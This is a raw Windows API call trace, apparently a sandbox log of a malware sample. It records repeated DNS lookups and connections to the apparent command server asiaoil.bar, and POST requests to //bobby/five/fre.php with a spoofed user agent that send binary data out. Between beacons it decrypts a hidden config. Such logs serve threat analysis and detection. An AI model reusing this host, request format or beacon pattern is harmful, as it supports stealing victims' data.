ppResult=0x19fcd8*=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0312.397] GetProcessHeap () returned 0x740000 [0312.397] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b600 [0312.397] socket (af=2, type=1, protocol=6) returned 0x304 [0312.397] connect (s=0x304, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0312.418] FreeAddrInfoW (pAddrInfo=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0312.418] GetProcessHeap () returned 0x740000 [0312.418] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cf68 [0312.418] GetProcessHeap () returned 0x740000 [0312.418] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0312.418] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0312.419] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0312.419] GetProcessHeap () returned 0x740000 [0312.419] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0312.419] GetProcessHeap () returned 0x740000 [0312.420] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0312.420] GetProcessHeap () returned 0x740000 [0312.420] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x7639c8 [0312.420] GetProcessHeap () returned 0x740000 [0312.420] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0312.421] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0312.422] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0312.422] GetProcessHeap () returned 0x740000 [0312.422] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0312.422] GetProcessHeap () returned 0x740000 [0312.422] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0312.422] send (s=0x304, buf=0x747928*, len=243, flags=0) returned 243 [0312.423] send (s=0x304, buf=0x761fd0*, len=159, flags=0) returned 159 [0312.423] GetProcessHeap () returned 0x740000 [0312.423] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0312.423] recv (in: s=0x304, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 567 [0312.525] GetProcessHeap () returned 0x740000 [0312.525] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0312.525] GetProcessHeap () returned 0x740000 [0312.525] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7639c8 | out: hHeap=0x740000) returned 1 [0312.525] GetProcessHeap () returned 0x740000 [0312.526] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0312.526] GetProcessHeap () returned 0x740000 [0312.526] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cf68 | out: hHeap=0x740000) returned 1 [0312.526] closesocket (s=0x304) returned 0 [0312.526] GetProcessHeap () returned 0x740000 [0312.526] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b600 | out: hHeap=0x740000) returned 1 [0312.527] GetProcessHeap () returned 0x740000 [0312.527] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0312.527] GetProcessHeap () returned 0x740000 [0312.527] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0312.527] GetProcessHeap () returned 0x740000 [0312.528] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0312.528] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe88) returned 0x304 [0312.530] Sleep (dwMilliseconds=0xea60) [0312.531] GetProcessHeap () returned 0x740000 [0312.531] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7637d0 [0312.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.533] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.540] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0312.547] GetProcessHeap () returned 0x740000 [0312.547] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0312.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.548] CryptImportKey (in: hProv=0x75d980, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0312.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.549] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.550] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.550] GetProcessHeap () returned 0x740000 [0312.551] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0312.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.552] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7637d0, pdwDataLen=0x19fcfc | out: pbData=0x7637d0, pdwDataLen=0x19fcfc) returned 1 [0312.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.553] CryptDestroyKey (hKey=0x74d768) returned 1 [0312.554] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.554] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 [0312.554] GetProcessHeap () returned 0x740000 [0312.554] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0312.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.555] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.556] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.557] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.557] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.604] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.604] GetProcessHeap () returned 0x740000 [0312.605] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c098 [0312.605] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.605] GetProcessHeap () returned 0x740000 [0312.605] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c098 | out: hHeap=0x740000) returned 1 [0312.605] GetProcessHeap () returned 0x740000 [0312.606] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0312.606] GetProcessHeap () returned 0x740000 [0312.606] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7637d0 | out: hHeap=0x740000) returned 1 [0312.606] GetProcessHeap () returned 0x740000 [0312.606] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0312.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.607] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.613] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0312.621] GetProcessHeap () returned 0x740000 [0312.621] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0312.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.622] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0312.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.624] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.625] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.625] GetProcessHeap () returned 0x740000 [0312.625] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0312.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.626] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0312.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.627] CryptDestroyKey (hKey=0x74d768) returned 1 [0312.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.628] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0312.629] GetProcessHeap () returned 0x740000 [0312.629] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0312.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.630] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0312.630] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.631] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0312.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.632] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0312.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.633] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0312.633] GetProcessHeap () returned 0x740000 [0312.633] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0312.633] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0312.635] GetProcessHeap () returned 0x740000 [0312.635] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0312.635] socket (af=2, type=1, protocol=6) returned 0x308 [0312.635] connect (s=0x308, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0312.659] FreeAddrInfoW (pAddrInfo=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0312.659] GetProcessHeap () returned 0x740000 [0312.659] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d540 [0312.659] GetProcessHeap () returned 0x740000 [0312.659] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0312.660] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0312.661] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0312.661] GetProcessHeap () returned 0x740000 [0312.661] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0312.661] GetProcessHeap () returned 0x740000 [0312.662] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0312.662] GetProcessHeap () returned 0x740000 [0312.662] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0312.662] GetProcessHeap () returned 0x740000 [0312.662] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0312.663] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0312.664] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0312.664] GetProcessHeap () returned 0x740000 [0312.664] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0312.664] GetProcessHeap () returned 0x740000 [0312.664] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0312.664] send (s=0x308, buf=0x747928*, len=243, flags=0) returned 243 [0312.665] send (s=0x308, buf=0x761fd0*, len=159, flags=0) returned 159 [0312.665] GetProcessHeap () returned 0x740000 [0312.665] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0312.665] recv (in: s=0x308, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0312.805] GetProcessHeap () returned 0x740000 [0312.806] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0312.806] GetProcessHeap () returned 0x740000 [0312.807] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0312.807] GetProcessHeap () returned 0x740000 [0312.807] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0312.807] GetProcessHeap () returned 0x740000 [0312.807] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d540 | out: hHeap=0x740000) returned 1 [0312.807] closesocket (s=0x308) returned 0 [0312.808] GetProcessHeap () returned 0x740000 [0312.808] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0312.808] GetProcessHeap () returned 0x740000 [0312.809] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0312.809] GetProcessHeap () returned 0x740000 [0312.809] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0312.809] GetProcessHeap () returned 0x740000 [0312.809] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0312.810] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x111c) returned 0x308 [0312.812] Sleep (dwMilliseconds=0xea60) [0312.813] GetProcessHeap () returned 0x740000 [0312.813] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763980 [0312.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.815] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.824] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0312.835] GetProcessHeap () returned 0x740000 [0312.835] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0312.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.837] CryptImportKey (in: hProv=0x75d980, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0312.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.856] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.857] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.857] GetProcessHeap () returned 0x740000 [0312.858] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0312.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.905] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763980, pdwDataLen=0x19fcfc | out: pbData=0x763980, pdwDataLen=0x19fcfc) returned 1 [0312.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.906] CryptDestroyKey (hKey=0x74d368) returned 1 [0312.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.907] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 [0312.907] GetProcessHeap () returned 0x740000 [0312.907] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0312.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.908] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0312.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.910] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0312.910] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.911] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0312.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.912] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0312.912] GetProcessHeap () returned 0x740000 [0312.912] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c070 [0312.912] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0312.912] GetProcessHeap () returned 0x740000 [0312.913] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c070 | out: hHeap=0x740000) returned 1 [0312.913] GetProcessHeap () returned 0x740000 [0312.913] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0312.913] GetProcessHeap () returned 0x740000 [0312.913] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763980 | out: hHeap=0x740000) returned 1 [0312.914] GetProcessHeap () returned 0x740000 [0312.914] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7636f8 [0312.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.915] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0312.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.923] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d430) returned 1 [0312.930] GetProcessHeap () returned 0x740000 [0312.930] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0312.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.932] CryptImportKey (in: hProv=0x75d430, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0312.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.933] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0312.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.934] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0312.934] GetProcessHeap () returned 0x740000 [0312.934] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0312.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.935] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7636f8, pdwDataLen=0x19fcfc | out: pbData=0x7636f8, pdwDataLen=0x19fcfc) returned 1 [0312.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.936] CryptDestroyKey (hKey=0x74d768) returned 1 [0312.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0312.937] CryptReleaseContext (hProv=0x75d430, dwFlags=0x0) returned 1 [0312.937] GetProcessHeap () returned 0x740000 [0312.937] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0312.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.938] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0312.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.939] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0312.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.940] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0312.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.941] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0312.941] GetProcessHeap () returned 0x740000 [0312.941] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdf0 [0312.941] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0312.943] GetProcessHeap () returned 0x740000 [0312.943] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b670 [0312.943] socket (af=2, type=1, protocol=6) returned 0x30c 